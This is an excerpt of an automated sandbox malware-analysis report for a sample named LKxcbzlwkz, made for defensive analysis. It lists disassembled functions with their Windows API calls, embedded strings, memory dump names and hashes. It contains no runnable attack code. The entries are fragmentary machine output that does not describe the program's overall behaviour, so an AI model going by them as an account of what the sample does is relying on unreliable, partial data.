                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 461458858-0
                                                                                                                                                                                                                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                                                                                                                            Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3969911579-0
                                                                                                                                                                                                                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                                                                                                                            Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 956284711-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                                                                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                                                                                                                                            Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                            • API String ID: 1965227024-3771769585
                                                                                                                                                                                                                                                            • Opcode ID: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
                                                                                                                                                                                                                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                                                                                                                                            Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: SendString$_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                            • API String ID: 369157077-1007645807
                                                                                                                                                                                                                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                                                                                                                                            Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                            • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                                                                                                                            Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1350042424-0
                                                                                                                                                                                                                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                                                                                                            Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                            • API String ID: 3052893215-2127371420
                                                                                                                                                                                                                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                                                                                                            Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                            • API String ID: 2295938435-2354261254
                                                                                                                                                                                                                                                            • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                                                                                                                                                                                                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                                                                                                            Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                            • API String ID: 3038501623-2263619337
                                                                                                                                                                                                                                                            • Opcode ID: dc9620d08dfc734223202b590395db350042df145fe2b73d815f634703a7222e
                                                                                                                                                                                                                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc9620d08dfc734223202b590395db350042df145fe2b73d815f634703a7222e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
